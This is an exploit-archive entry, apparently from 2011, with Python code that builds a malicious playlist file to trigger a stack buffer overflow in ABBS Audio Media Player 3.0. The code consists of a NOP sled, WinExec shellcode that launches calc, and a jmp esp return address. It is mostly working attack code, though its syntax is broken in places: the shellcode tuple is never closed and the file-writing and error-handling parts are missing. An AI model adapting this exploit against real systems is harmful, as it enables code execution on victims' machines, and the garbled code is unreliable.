ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)

Ruben Garrote Garca 14.03.2011 Verified Vulnerable-App
Local Exploits Windows

Exploit Code

# Exploit: ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)
# Date: 14.03.11
# Author: Rh0 (Rh0[at]
# Software Link:
# Version: 3.0
# Tested on: WinXP Pro SP3 EN (VirtualBox)

print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0 [*]"
bufferlen = 4108;				# buffer until return address overwrite
nops = "\x90" * 5;
## WinExec("calc",1)
shellcode = (
		"\x33\xC0"			# xor eax,eax
		"\x50"				# push eax
		"\x68\x63\x61\x6C\x63"		# push 'calc'
		"\x8B\xDC"			# mov ebx, esp
		"\xB0\x01"			# mov al, 1
		"\x50"				# push eax
		"\x53"				# push ebx
		"\xB8\x0C\x25\x86\x7C"		# mov eax, 7C86250C
		"\x04\x01"			# add al, 1
		"\xFF\xD0"			# call eax (WinExec@kernel32.dll)
ret = "\x87\xa7\xa7\x7c";			# jmp esp @user32.dll (0x7ca7a787)
esp = "\xe9\xeb\xef\xff\xff";	# jmp backwards 4116 bytes

buffer  = nops
buffer += shellcode
buffer += "A" * (bufferlen - len(buffer))
buffer += ret;
buffer += esp;

	A = open("exploit.lst","wb")		# exploit works also with .m3u
	print "[*] exploit.lst created [*]"
	print "[*] Error while creating file [*]"

print "[*] Enter to continue.. [*]"